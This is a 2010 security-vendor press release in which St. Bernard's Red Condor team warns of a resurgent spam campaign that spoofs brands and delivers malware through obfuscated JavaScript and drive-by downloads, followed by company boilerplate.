SOURCE: St. Bernard

St. Bernard

September 20, 2010 18:43 ET

St. Bernard's Red Condor Security Team Warns of Resurgence of Aggressive Plug-and-Play Malware Campaign

St. Bernard's Red Condor Blocks Millions of Template-Based Spoofed and Misdirected Personal Emails as PNP Spammers Once Again Pick up the Pace

SAN DIEGO, CA--(Marketwire - September 20, 2010) -  After nearly two weeks of dormancy, spammers associated with the recent string of plug-and-play (PNP) malware campaigns have once again returned in force distributing millions of new virulent messages using what appear to be stolen emails as templates for the email messages and brand spoofs. St. Bernard's Red Condor (OTCBB: SBSW) security team today issued a warning of the campaigns after the company blocked more than 8 million messages since the middle of last week. The cyber-criminals, which have actively spoofed major brands, including Amazon, eBay, Facebook and WordPress are also using "misdirected" personal email as templates.

"Like the global 'Here you have...' spam campaign from earlier this month, this new round of PNP spam is virulent and relies on social engineering to get users to click on a link or open an attachment, but that is where the similarities end," said Mary Mizrahi, product manager at St. Bernard. "The PNP spam is much more sophisticated and more dangerous than the 'Here You Have...' campaign, which did not cause any harm to computers. From a single click on a link in the PNP email message, multiple exploits can silently infect a computer system in a matter of seconds."

Mizrahi added, "The PNP campaigns also are employing a second phase, which uses social engineering trickery to convince users to download and install what could be a cocktail of malware. Among the malware appears to be root-kits that can be used to plant keyloggers, sniff banking credentials and perform other nefarious activities, which are much bigger threats than simply turning a computer into a spam-spewing machine as the 'Here you have...' campaign attempted to do."

The cyber-criminals behind the PNP malware campaigns continue to evolve in their methods to bypass filters and convince users to click on a link or open an attachment in an email. The scammers also appear to have switched from using their own obfuscation techniques for JavaScript that is sent through email to using commercially available tools like AntsSoft HTML Protector, which is designed to prevent certain actions on web pages such as right-clicking.

If a recipient opens the HTML attachment in the spam emails, the embedded JavaScript causes the browser to navigate to the compromised host, which then performs a silent drive-by-download (iFrame technique) of more obfuscated JavaScript. The additional script attempts several exploits and shuttles the browser to another fake anti-virus site, similar to the sites reported in August 2010. The JavaScript obfuscation technique for the downloader component of this campaign has been completely revamped, and is attempting to exploit CVE-2010-0886, vulnerability in the Java Development Toolkit, as well as pulling down several other virulent components, including "installer_m.exe," "flash.swf" and "libtiff.pdf." A Virus Total scan of the multiple malicious components contained in the downloader found that none of the virus engines had detected installer_m.exe, 12 had identified the flash.swf as a Trojan virus, and five had detected libtiff.pdf.

Visit St. Bernard's Red Condor Security Alerts blog for more details on PNP malware.

About St. Bernard Software 
St. Bernard Software develops and markets Internet security appliances and services that empower IT professionals to effectively, efficiently and intelligently manage their enterprise's Internet-based resources. Originally founded in 1995 as a market-leader in data security with its flagship product, Open File Manager™, the company is now recognized for delivering today's #1 Web filtering and security appliance, iPrism®. With millions of end users worldwide in more than 5,000 enterprises, educational institutions, SMB, and government agencies, St. Bernard strives to deliver simple, high performance solutions that offer excellent value to our customers. 

Based in San Diego, California, St. Bernard (OTCBB: SBSW) markets its solutions through a network of value-added resellers, distributors, system integrators, OEM partners and directly to end users. For more information about St. Bernard Software, visit www.stbernard.com.

About Red Condor 
Now part of St. Bernard, Red Condor's highly accurate email filter Vx Technology™ hybrid architecture and fully managed appliances lead to a dramatic reduction in the cost of owning a premium spam filter. With email security solutions for small-to-medium businesses, as well as for ISPs with millions of email inboxes, Red Condor is rapidly gaining market share. The company's email security system has built-in zero tolerance for lost email, and a near zero false-positive rate, with spam block rates that exceed 99%. Red Condor Archive is a secure message archiving service with lifetime retention and unlimited storage. The company's award-winning technology is backed 24/7 by a team of human email security experts monitoring for the latest email threats. For more information, visit www.redcondor.com.

©2010 St. Bernard Software Inc. All rights reserved. The St. Bernard Software logo, iPrism, iGuard, the Red Condor Logo, and Vx Technology are trademarks of St. Bernard Software Inc. All other trademarks and registered trademarks are hereby acknowledged.

Contact Information

  • Media contact:
    Lorrie Hunsaker
    St. Bernard
    (858) 524-2041
    Email Contact